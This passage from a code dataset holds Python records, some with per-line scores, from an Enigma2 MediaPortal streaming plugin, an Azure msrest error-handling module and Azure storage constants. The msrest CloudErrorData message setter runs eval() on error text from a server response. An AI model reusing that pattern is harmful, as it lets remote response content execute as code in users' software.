"\t\t\tself.filmliste.append((_('No supported streams found!'), None))\n", "\t\tself.ml.setList(map(self._defaultlisthoster, self.filmliste))\n", "\t\tself.keyLocked = False\n", "\n", "\tdef keyOK(self):\n", "\t\thostername = self['liste'].getCurrent()[0][0]\n", "\t\thoster = self['liste'].getCurrent()[0][1]\n", "\t\tget_stream_link(self.session).check_link(hoster, self.playfile)\n", "\n", "\tdef playfile(self, stream_url):\n", "\t\tif stream_url != None:\n", "\t\t\tself.session.open(SimplePlayer, [(self.serienName, stream_url, self.serienPic)], showPlaylist=False, ltype='serien.bz', cover=True)\n", "\n", "class sbzWatchlistScreen(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft,\n", "\t\t\t\"red\"\t: self.delWatchListEntry\n", "\t\t}, -1)\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Watchlist\")\n", "\t\tself['F1'] = Label(_(\"Delete\"))\n", "\n", "\t\tself.watchListe = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.watchListe = 
[]\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"read watchlist\"\n", "\t\t\treadStations = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"r\")\n", "\t\t\tfor rawData in readStations.readlines():\n", "\t\t\t\tdata = re.findall('\"(.*?)\" \"(.*?)\" \"(.*?)\" \"(.*?)\"', rawData, re.S)\n", "\t\t\t\tif data:\n", "\t\t\t\t\t(title, link, image, handlung) = data[0]\n", "\t\t\t\t\tprint title, link, image\n", "\t\t\t\t\tself.watchListe.append((title, link, image, handlung))\n", "\t\t\tprint \"Load Watchlist..\"\n", "\t\t\tself.watchListe.sort()\n", "\t\t\tself.ml.setList(map(self._defaultlistleft, self.watchListe))\n", "\t\t\treadStations.close()\n", "\t\t\tself.showInfos()\n", "\t\t\tself.keyLocked = False\n", "\n", "\tdef showInfos(self):\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"read watchlist\"\n", "\t\t\treadStations = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"r\")\n", "\t\t\tfor rawData in readStations.readlines():\n", "\t\t\t\tdata = re.findall('\"(.*?)\" \"(.*?)\" \"(.*?)\" \"(.*?)\"', rawData, re.S)\n", "\t\t\t\tif data:\n", "\t\t\t\t\tself.ImageUrl = self['liste'].getCurrent()[0][2]\n", "\t\t\t\t\tself.Handlung = self['liste'].getCurrent()[0][3]\n", "\t\t\t\t\tself['handlung'].setText(decodeHtml(self.Handlung))\n", "\t\t\t\t\tCoverHelper(self['coverArt']).getCover(self.ImageUrl)\n", "\t\telse:\n", "\t\t\tself['handlung'].setText(_(\"No information found.\"))\n", "\t\t\tpicPath = \"%s/skins/%s/images/no_coverArt.png\" % (self.plugin_path, config.mediaportal.skin.value)\n", "\t\t\tCoverHelper(self['coverArt']).getCover(picPath)\n", "\n", "\tdef delWatchListEntry(self):\n", "\t\texist = self['liste'].getCurrent()\n", "\t\tif self.keyLocked or exist == None:\n", "\t\t\treturn\n", "\n", "\t\tentryDeleted = False\n", "\t\tselectedName = self['liste'].getCurrent()[0][0]\n", "\n", "\t\twriteTmp = 
open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist.tmp\",\"w\")\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\treadWatchlist = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"r\")\n", "\t\t\tfor rawData in readWatchlist.readlines():\n", "\t\t\t\tdata = re.findall('\"(.*?)\" \"(.*?)\" \"(.*?)\" \"(.*?)\"', rawData, re.S)\n", "\t\t\t\tif data:\n", "\t\t\t\t\t(title, link, image, handlung) = data[0]\n", "\t\t\t\t\tif title != selectedName:\n", "\t\t\t\t\t\twriteTmp.write('\"%s\" \"%s\" \"%s\" \"%s\"\\n' % (title, link, image, handlung))\n", "\t\t\t\t\telse:\n", "\t\t\t\t\t\tif entryDeleted:\n", "\t\t\t\t\t\t\twriteTmp.write('\"%s\" \"%s\" \"%s\" \"%s\"\\n' % (title, link, image, handlung))\n", "\t\t\t\t\t\telse:\n", "\t\t\t\t\t\t\tentryDeleted = True\n", "\t\t\treadWatchlist.close()\n", "\t\t\twriteTmp.close()\n", "\t\t\tshutil.move(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist.tmp\", config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\")\n", "\t\t\tself.loadPage()\n", "\n", "\tdef keyOK(self):\n", "\t\texist = self['liste'].getCurrent()\n", "\t\tif self.keyLocked or exist == None:\n", "\t\t\treturn\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tserienPic = self['liste'].getCurrent()[0][2]\n", "\t\tself.session.open(SerienEpListingScreen, serienLink, serienName, serienPic)" ]
[ 0, 0, 0, 0, 0.02857142857142857, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.09090909090909091, 0.08333333333333333, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.08, 0.1111111111111111, 0, 0.02702702702702703, 0.024390243902439025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.0425531914893617, 0.015384615384615385, 0.04, 0.05263157894736842, 0, 0.05555555555555555, 0.022222222222222223, 0.03333333333333333, 0.024390243902439025, 0.125, 0.024390243902439025, 0, 0.027777777777777776, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 0.09090909090909091, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.08, 0.1111111111111111, 0, 0.02702702702702703, 0.020833333333333332, 0.022727272727272728, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.037037037037037035, 0.022727272727272728, 0, 0.03571428571428571, 0.012987012987012988, 0.1, 0.043478260869565216, 0.025, 0.015625, 0.015384615384615385, 0.038461538461538464, 0.05, 0, 0.045454545454545456, 0.023255813953488372, 0.03333333333333333, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.020833333333333332, 0.020833333333333332, 0.015625, 0, 0.02, 0, 0.018518518518518517, 0.03225806451612903, 0.03225806451612903, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 
0.02857142857142857, 0.03333333333333333, 0, 0.020833333333333332, 0.08333333333333333, 0.07142857142857142, 0.09090909090909091, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.07692307692307693, 0.06451612903225806, 0.1111111111111111, 0, 0.02702702702702703, 0.015873015873015872, 0.022727272727272728, 0.022727272727272728, 0, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0.0625, 0.047619047619047616, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.030303030303030304, 0.03571428571428571, 0.125, 0.04, 0.022727272727272728, 0, 0.03571428571428571, 0.014925373134328358, 0.1, 0.025, 0.015625, 0.015873015873015872, 0.038461538461538464, 0.04032258064516129, 0.05, 0, 0.045454545454545456, 0.02127659574468085, 0.02158273381294964, 0, 0.034482758620689655, 0.01834862385321101, 0.06666666666666667, 0.018518518518518517, 0.017543859649122806, 0.125, 0.045454545454545456, 0.02040816326530612, 0.014084507042253521, 0.018518518518518517, 0.02, 0.125, 0.02040816326530612, 0.015267175572519083, 0.029411764705882353, 0.045454545454545456, 0.016666666666666666, 0.1111111111111111, 0.017543859649122806, 0, 0.04, 0.047619047619047616, 0.1, 0, 0.018867924528301886, 0.018867924528301886, 0, 0.014084507042253521, 0, 0.0125, 0.03333333333333333, 0.02531645569620253, 0, 0.013157894736842105, 0.02127659574468085, 0.034482758620689655, 0.017391304347826087, 0.04, 0.014598540145985401, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.020833333333333332, 0.020833333333333332, 0.03225806451612903, 0.024390243902439025, 0, 0.02564102564102564, 0, 0.015384615384615385, 0.03225806451612903, 0.03225806451612903, 0.034482758620689655, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 0.09090909090909091, 0.03571428571428571, 
0.1111111111111111, 0, 0.02702702702702703, 0.01818181818181818, 0.025, 0, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.041666666666666664, 0.017543859649122806, 0.022727272727272728, 0, 0.03571428571428571, 0.013157894736842105, 0.05555555555555555, 0.05263157894736842, 0.012987012987012988, 0.0625, 0.05, 0.0297029702970297, 0.05555555555555555, 0.034482758620689655, 0.029411764705882353, 0.07692307692307693, 0.030303030303030304, 0, 0.034482758620689655, 0.029411764705882353, 0.07692307692307693, 0.030303030303030304, 0, 0.03225806451612903, 0, 0.02127659574468085, 0.015384615384615385, 0.03571428571428571, 0, 0.05555555555555555, 0.020833333333333332, 0.020833333333333332, 0.03225806451612903, 0.022988505747126436, 0, 0.023255813953488372, 0, 0.015384615384615385, 0.03225806451612903, 0.03225806451612903, 0.034482758620689655, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 0.09090909090909091, 0.03571428571428571, 0.1111111111111111, 0, 0.02702702702702703, 0.018518518518518517, 0.025, 0, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.017543859649122806, 0.046511627906976744, 0.023809523809523808, 0.02127659574468085, 0.03225806451612903, 0.014925373134328358, 0.015625, 0.04, 0, 0.05555555555555555, 0.020833333333333332, 0.022727272727272728, 0.015151515151515152, 0, 0.030303030303030304, 0.08, 0.014814814814814815, 0, 0.027777777777777776, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 
0.09090909090909091, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.07692307692307693, 0.058823529411764705, 0.1111111111111111, 0, 0.041666666666666664, 0.02702702702702703, 0.022727272727272728, 0.029411764705882353, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.022727272727272728, 0, 0.047619047619047616, 0.043478260869565216, 0.013157894736842105, 0.038461538461538464, 0.03488372093023256, 0.022727272727272728, 0.013888888888888888, 0.07692307692307693, 0.021739130434782608, 0.03333333333333333, 0.016666666666666666, 0.03571428571428571, 0.038461538461538464, 0.015625, 0.041666666666666664, 0.05, 0.038461538461538464, 0, 0.045454545454545456, 0.013157894736842105, 0.038461538461538464, 0.03488372093023256, 0.022727272727272728, 0.013888888888888888, 0.07692307692307693, 0.018518518518518517, 0.018518518518518517, 0.017543859649122806, 0.01694915254237288, 0.125, 0.017857142857142856, 0.0196078431372549, 0.0196078431372549, 0, 0.03333333333333333, 0.02702702702702703, 0.05263157894736842, 0.1, 0, 0.043478260869565216, 0.02, 0, 0.03529411764705882, 0.013157894736842105, 0.034482758620689655, 0.022222222222222223, 0.013888888888888888, 0.07692307692307693, 0.021739130434782608, 0.03225806451612903, 0.012658227848101266, 0.09090909090909091, 0.043478260869565216, 0.0125, 0.08333333333333333, 0.037037037037037035, 0.04, 0.05, 0.014598540145985401, 0.05263157894736842, 0, 0.05555555555555555, 0.02702702702702703, 0.05263157894736842, 0.1, 0.020833333333333332, 0.020833333333333332, 0.02127659574468085, 0.025974025974025976 ]
441
0.033868
false
# -------------------------------------------------------------------------- # # Copyright (c) Microsoft Corporation. All rights reserved. # # The MIT License (MIT) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the ""Software""), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # # -------------------------------------------------------------------------- from requests import RequestException from msrest.exceptions import ClientException from msrest.serialization import Deserializer from msrest.exceptions import DeserializationError class CloudErrorData(object): """Cloud Error Data object, deserialized from error data returned during a failed REST API call. 
""" _validation = {} _attribute_map = { 'error': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'data': {'key': 'values', 'type': '{str}'} } def __init__(self, *args, **kwargs): self.error = None self._message = None self.request_id = None self.error_time = None self.data = None super(CloudErrorData, self).__init__(*args) def __str__(self): """Cloud error message.""" return str(self._message) @classmethod def _get_subtype_map(cls): return {} @property def message(self): """Cloud error message.""" return self._message @message.setter def message(self, value): """Attempt to deconstruct error message to retrieve further error data. """ try: value = eval(value) except (SyntaxError, TypeError): pass try: value = value.get('value', value) msg_data = value.split('\n') self._message = msg_data[0] except AttributeError: self._message = value return try: self.request_id = msg_data[1].partition(':')[2] time_str = msg_data[2].partition(':') self.error_time = Deserializer.deserialize_iso( "".join(time_str[2:])) except (IndexError, DeserializationError): pass class CloudError(ClientException): """ClientError, exception raised for failed Azure REST call. Will attempt to deserialize response into meaningful error data. :param requests.Response response: Response object. :param str error: Optional error message. 
""" def __init__(self, response, error=None, *args, **kwargs): self.deserializer = Deserializer() self.error = None self.message = None self.response = response self.status_code = self.response.status_code self.request_id = None if error: self.message = error self.error = response else: self._build_error_data(response) if not self.error or not self.message: self._build_error_message(response) super(CloudError, self).__init__( self.message, self.error, *args, **kwargs) def __str__(self): """Cloud error message""" return str(self.message) def _build_error_data(self, response): try: data = response.json() except ValueError: data = response else: data = data.get('error', data) try: self.error = self.deserializer(CloudErrorData(), data) except DeserializationError: self.error = None else: if self.error: if not self.error.error or not self.error.message: self.error = None else: self.message = self.error.message def _get_state(self, content): state = content.get("status") if not state: resource_content = content.get('properties', content) state = resource_content.get("provisioningState") return "Resource state {}".format(state) if state else "none" def _build_error_message(self, response): try: data = response.json() except ValueError: message = "none" else: message = data.get("message", self._get_state(data)) try: response.raise_for_status() except RequestException as err: if not self.error: self.error = err if not self.message: if message == "none": message = str(err) msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format(response.reason, message) else: if not self.error: self.error = response if not self.message: msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format( response.status_code, message)
[ "# --------------------------------------------------------------------------\n", "#\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "#\n", "# The MIT License (MIT)\n", "#\n", "# Permission is hereby granted, free of charge, to any person obtaining a copy\n", "# of this software and associated documentation files (the \"\"Software\"\"), to\n", "# deal in the Software without restriction, including without limitation the\n", "# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n", "# sell copies of the Software, and to permit persons to whom the Software is\n", "# furnished to do so, subject to the following conditions:\n", "#\n", "# The above copyright notice and this permission notice shall be included in\n", "# all copies or substantial portions of the Software.\n", "#\n", "# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n", "# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n", "# IN THE SOFTWARE.\n", "#\n", "# --------------------------------------------------------------------------\n", "\n", "from requests import RequestException\n", "\n", "from msrest.exceptions import ClientException\n", "from msrest.serialization import Deserializer\n", "from msrest.exceptions import DeserializationError\n", "\n", "\n", "class CloudErrorData(object):\n", " \"\"\"Cloud Error Data object, deserialized from error data returned\n", " during a failed REST API call.\n", " \"\"\"\n", "\n", " _validation = {}\n", " _attribute_map = {\n", " 'error': {'key': 'code', 'type': 'str'},\n", " 'message': {'key': 'message', 'type': 'str'},\n", " 'data': {'key': 'values', 'type': '{str}'}\n", " }\n", "\n", " def __init__(self, *args, **kwargs):\n", " self.error = None\n", " self._message = None\n", " self.request_id = None\n", " self.error_time = None\n", " self.data = None\n", " super(CloudErrorData, self).__init__(*args)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return str(self._message)\n", "\n", " @classmethod\n", " def _get_subtype_map(cls):\n", " return {}\n", "\n", " @property\n", " def message(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return self._message\n", "\n", " @message.setter\n", " def message(self, value):\n", " \"\"\"Attempt to deconstruct error message to retrieve further\n", " error data.\n", " \"\"\"\n", " try:\n", " value = eval(value)\n", " except (SyntaxError, TypeError):\n", " pass\n", " try:\n", " value = value.get('value', value)\n", " msg_data = value.split('\\n')\n", " self._message = msg_data[0]\n", " except AttributeError:\n", " self._message = value\n", " return\n", " try:\n", " self.request_id = msg_data[1].partition(':')[2]\n", " 
time_str = msg_data[2].partition(':')\n", " self.error_time = Deserializer.deserialize_iso(\n", " \"\".join(time_str[2:]))\n", " except (IndexError, DeserializationError):\n", " pass\n", "\n", "\n", "class CloudError(ClientException):\n", " \"\"\"ClientError, exception raised for failed Azure REST call.\n", " Will attempt to deserialize response into meaningful error\n", " data.\n", "\n", " :param requests.Response response: Response object.\n", " :param str error: Optional error message.\n", " \"\"\"\n", "\n", " def __init__(self, response, error=None, *args, **kwargs):\n", " self.deserializer = Deserializer()\n", " self.error = None\n", " self.message = None\n", " self.response = response\n", " self.status_code = self.response.status_code\n", " self.request_id = None\n", "\n", " if error:\n", " self.message = error\n", " self.error = response\n", " else:\n", " self._build_error_data(response)\n", "\n", " if not self.error or not self.message:\n", " self._build_error_message(response)\n", " \n", " super(CloudError, self).__init__(\n", " self.message, self.error, *args, **kwargs)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message\"\"\"\n", " return str(self.message)\n", "\n", " def _build_error_data(self, response):\n", " try:\n", " data = response.json()\n", " except ValueError:\n", " data = response\n", " else:\n", " data = data.get('error', data)\n", " try:\n", " self.error = self.deserializer(CloudErrorData(), data)\n", " except DeserializationError:\n", " self.error = None\n", " else:\n", " if self.error:\n", " if not self.error.error or not self.error.message:\n", " self.error = None\n", " else:\n", " self.message = self.error.message\n", "\n", " def _get_state(self, content):\n", " state = content.get(\"status\")\n", " if not state:\n", " resource_content = content.get('properties', content)\n", " state = resource_content.get(\"provisioningState\")\n", " return \"Resource state {}\".format(state) if state else \"none\"\n", "\n", " def 
_build_error_message(self, response):\n", " try:\n", " data = response.json()\n", " except ValueError:\n", " message = \"none\"\n", " else:\n", " message = data.get(\"message\", self._get_state(data))\n", " try:\n", " response.raise_for_status()\n", " except RequestException as err:\n", " if not self.error:\n", " self.error = err\n", " if not self.message:\n", " if message == \"none\":\n", " message = str(err)\n", " msg = \"Operation failed with status: {!r}. Details: {}\"\n", " self.message = msg.format(response.reason, message)\n", " else:\n", " if not self.error:\n", " self.error = response\n", " if not self.message:\n", " msg = \"Operation failed with status: {!r}. Details: {}\"\n", " self.message = msg.format(\n", " response.status_code, message)" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02 ]
173
0.003006
false
#------------------------------------------------------------------------- # Copyright (c) Microsoft. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #-------------------------------------------------------------------------- import platform __author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>' __version__ = '0.30.0' # x-ms-version for storage service. X_MS_VERSION = '2015-04-05' # UserAgent string sample: 'Azure-Storage/0.30.0 (Python CPython 3.4.2; Windows 8)' _USER_AGENT_STRING = 'Azure-Storage/{} (Python {} {}; {} {})'.format(__version__, platform.python_implementation(), platform.python_version(), platform.system(), platform.release()) # Live ServiceClient URLs SERVICE_HOST_BASE = 'core.windows.net' DEFAULT_PROTOCOL = 'https' # Development ServiceClient URLs DEV_BLOB_HOST = '127.0.0.1:10000' DEV_QUEUE_HOST = '127.0.0.1:10001' DEV_TABLE_HOST = '127.0.0.1:10002' # Default credentials for Development Storage Service DEV_ACCOUNT_NAME = 'devstoreaccount1' DEV_ACCOUNT_KEY = 'Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==' # Socket timeout in seconds is 5 min * 60 seconds _SOCKET_TIMEOUT = 5 * 60
[ "#-------------------------------------------------------------------------\n", "# Copyright (c) Microsoft. All rights reserved.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "#--------------------------------------------------------------------------\n", "import platform\n", "\n", "__author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>'\n", "__version__ = '0.30.0'\n", "\n", "# x-ms-version for storage service.\n", "X_MS_VERSION = '2015-04-05'\n", "\n", "# UserAgent string sample: 'Azure-Storage/0.30.0 (Python CPython 3.4.2; Windows 8)'\n", "_USER_AGENT_STRING = 'Azure-Storage/{} (Python {} {}; {} {})'.format(__version__, platform.python_implementation(), platform.python_version(), platform.system(), platform.release())\n", "\n", "# Live ServiceClient URLs\n", "SERVICE_HOST_BASE = 'core.windows.net'\n", "DEFAULT_PROTOCOL = 'https'\n", "\n", "# Development ServiceClient URLs\n", "DEV_BLOB_HOST = '127.0.0.1:10000'\n", "DEV_QUEUE_HOST = '127.0.0.1:10001'\n", "DEV_TABLE_HOST = '127.0.0.1:10002'\n", "\n", "# Default credentials for Development Storage Service\n", "DEV_ACCOUNT_NAME = 'devstoreaccount1'\n", "DEV_ACCOUNT_KEY = 'Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw=='\n", "\n", "# Socket timeout in seconds is 5 min * 60 seconds\n", "_SOCKET_TIMEOUT = 5 * 60" ]
[ 0.013333333333333334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0.005494505494505495, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009174311926605505, 0, 0, 0.041666666666666664 ]
40
0.002368
false
# -*- coding: utf-8 -*- from Plugins.Extensions.MediaPortal.plugin import _ from Plugins.Extensions.MediaPortal.resources.imports import * from Plugins.Extensions.MediaPortal.resources.keyboardext import VirtualKeyBoardExt from Plugins.Extensions.MediaPortal.resources.songstolink import SongstoLink from Plugins.Extensions.MediaPortal.resources.simpleplayer import SimplePlayer, SimplePlaylist class showSongstoGenre(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel }, -1) self.baseurl = 'http://songs.to/json/songlist.php?' 
self["title"] = Label("Songs.to Music Player") self['ContentTitle'] = Label('Music Tops') self['name'] = Label(_("Selection:")) self.genreliste = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.keyLocked = False self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.keyLocked = True url = "http://s.songs.to/js/data-en.js" getPage(url).addCallback(self.genreData).addErrback(self.dataError) def genreData(self, data): preparse = re.search('chart_types={(.*?)}', data, re.S).groups() if preparse: parse = re.findall("(music.*?):\\'(.*?)\\'", preparse[0], re.S) if parse: for (scUrl, scName) in parse: self.genreliste.append((scName, "charts="+scUrl)) self.genreliste.insert(0, ("Songs Top 500", "top=all")) self.genreliste.insert(0, ("Search Album", "&col=album")) self.genreliste.insert(0, ("Search Title", "&col=title")) self.genreliste.insert(0, ("Search Artist", "&col=artist")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) self.keyLocked = False def keyOK(self): if self.keyLocked: return scName = self['liste'].getCurrent()[0][0] scUrl = self['liste'].getCurrent()[0][1] if scName == "Songs Top 500": scUrl = self.baseurl + scUrl self.session.open(showSongstoAll, scUrl, scName) elif re.match('Search.*?', scName): self.suchtitel = scName self.suchmodus = scUrl self.session.openWithCallback(self.searchCallback, VirtualKeyBoardExt, title = (self.suchtitel), text = "", is_dialog=True) else: scUrl = self.baseurl + scUrl self.session.open(showSongstoTop, scUrl, scName) def searchCallback(self, callbackStr): if callbackStr is not None: self.suchString = callbackStr.replace(' ', '%20') scUrl = self.baseurl + "keyword=" + self.suchString + self.suchmodus scName = self.suchtitel + ": " + callbackStr self.session.open(showSongstoAll, scUrl, scName) class showSongstoAll(MPScreen): def __init__(self, session, link, name): self.scLink = link self.scGuiName = name self.plugin_path = 
